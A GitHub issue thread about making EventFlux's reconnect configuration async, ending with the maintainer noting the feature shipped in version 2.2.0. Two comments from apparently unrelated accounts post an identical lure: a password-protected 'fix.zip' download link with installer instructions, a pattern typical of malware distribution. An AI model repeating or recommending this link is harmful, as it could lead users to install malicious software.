### ISSUE TITLE
Making reconnect config async

### ISSUE THREAD

**Issue by Imgkl** [Imgkl/EventFlux#29]
Making reconnect config async to support the cases where fetching the refresh tokens are fetched asynchronously.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Imgkl** [comment]
@Qsgz2023ji5ban @NhutDang2002 who tf are you guys? Respectfully.

**Comment by Imgkl** [comment]
@ElectricCookie I'll track this here.

**Comment by Imgkl** [comment]
@ElectricCookie This is now available on the version 2.2.0.
